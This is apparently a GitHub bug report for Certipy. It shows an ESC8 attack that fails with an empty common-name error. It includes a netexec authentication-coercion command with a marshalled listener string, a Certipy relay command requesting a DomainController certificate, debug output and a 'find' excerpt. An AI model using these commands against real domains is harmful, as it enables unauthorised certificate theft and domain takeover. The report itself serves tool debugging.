[Bug] ValueError: Attribute's length must be >= 1 and <= 64, but it was 0Β #342
Description
π’ Certipy Version
5.0.4
π₯οΈ Operating System
Kali Linux 2025.3
π₯ Command Used
certipy-ad relay -target http://redacted.domain.com -debug -out login.pfx -template DomainController𧯠Error Message / Unexpected Output
[*] SMBD-Thread-30 (process_request_thread): Received connection from 10.10.10.10, attacking target http://redacted.domain.com
[+] Using target: http://redacted.domain.com/certsrv/certfnsh.asp...
[+] Base URL: http://redacted.domain.com
[+] Path: /certsrv/certfnsh.asp
[+] Using timeout: 10
[+] Using path: /certsrv/certfnsh.asp
[+] Using path: /certsrv/certfnsh.asp
[*] HTTP Request: GET http://redacted.domain.com/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://redacted.domain.com/certsrv/certfnsh.asp "HTTP/1.1 401 Unauthorized"
[*] HTTP Request: GET http://redacted.domain.com/certsrv/certfnsh.asp "HTTP/1.1 200 OK"
[+] HTTP server returned status code 200, treating as successful login
[*] Authenticating against http://redacted.domain.com as / SUCCEED
[+] Generating RSA key
[-] Failed to run attack: Attribute's length must be >= 1 and <= 64, but it was 0
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/certipy/commands/relay.py", line 423, in run
self._run()
~~~~~~~~~^^
File "/usr/lib/python3/dist-packages/certipy/commands/relay.py", line 454, in _run
self._request_certificate()
~~~~~~~~~~~~~~~~~~~~~~~~~^^
File "/usr/lib/python3/dist-packages/certipy/commands/relay.py", line 527, in _request_certificate
csr, key = create_csr(
~~~~~~~~~~^
self.username,
^^^^^^^^^^^^^^
...<6 lines>...
smime=self.adcs_relay.smime,
^^^^^^^^^^^^^^^^^^^^^^^^^^^^
)
^
File "/usr/lib/python3/dist-packages/certipy/lib/certificate.py", line 811, in create_csr
x509.NameAttribute(NameOID.COMMON_NAME, username.capitalize()),
~~~~~~~~~~~~~~~~~~^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/usr/lib/python3/dist-packages/cryptography/x509/name.py", line 152, in __init__
raise ValueError(msg)
ValueError: Attribute's length must be >= 1 and <= 64, but it was 0
π Relevant certipy find Output (abbreviated and redacted)
Certificate Authorities
0
CA Name : domain-CA
DNS Name : redacted.domain.com
Certificate Subject : CN=domain-CA, DC=domain, DC=com
Certificate Serial Number : 2321B22DF2AD6F8B4E5FC638A6F83C64
Certificate Validity Start : 2025-12-22 14:48:57+00:00
Certificate Validity End : 2525-12-22 14:58:57+00:00
Web Enrollment
HTTP
Enabled : True
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : domain\Administrators
Access Rights
ManageCa : domain\Administrators
domain\Domain Admins
domain\Enterprise Admins
ManageCertificates : domain\Administrators
domain\Domain Admins
domain\Enterprise Admins
Enroll : domain\Authenticated Users
[!] Vulnerabilities
ESC8 : Web Enrollment is enabled over HTTP.
Certificate Templates : [!] Could not find any certificate templates
β Expected Behavior
Used netexec to coerce the authentication (coerce_plus), coercion methods were successful and should've returned a relayed administrator.pfx certificate.
I was using kerberos authentication.
netexec smb -M coerce_plus --use-kcache dc.domain.com -o LISTENER=DC-DCUWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
π Additional Context
Downgraded to Python 3.9.0, Python 3.10.0, and ran an earlier Certipy version (Certipy 4.8.2), same issue.